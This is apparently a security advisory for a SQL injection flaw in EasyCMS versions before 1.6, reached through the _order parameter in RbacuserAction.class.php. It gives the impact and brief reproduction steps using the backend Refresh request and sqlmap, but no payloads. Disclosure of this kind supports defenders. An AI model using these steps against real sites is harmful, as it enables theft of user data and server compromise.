EasyCMS SQL Injection Vulnerability in RbacuserAction.class.php Prior to 1.6

A SQL injection vulnerability has been identified in EasyCMS versions prior to 1.6. The issue resides in the RbacuserAction.class.php file within the Request Parameter Handler component. The vulnerability is triggered by manipulating the _order argument, which the application fails to properly validate and sanitize. This oversight allows attackers to inject malicious SQL payloads, exploiting the application remotely. The vulnerability has been publicly disclosed and is actively being exploited.

Impact

Exploitation of this vulnerability allows attackers to perform blind SQL injection, bypass authentication, and manipulate database information. This includes unauthorized access to sensitive data, such as user passwords and personal information, and the potential to execute system commands, leading to a complete server compromise.

Reproduction

To reproduce this vulnerability, navigate to the backend user management page of an EasyCMS installation prior to version 1.6. Click the 'Refresh' button, which will trigger a request that includes the _order parameter. The application will not properly validate this parameter, allowing for the injection of malicious SQL payloads. This exploitation can be verified using sqlmap, which will demonstrate the vulnerability by extracting database information or executing SQL commands through the injection.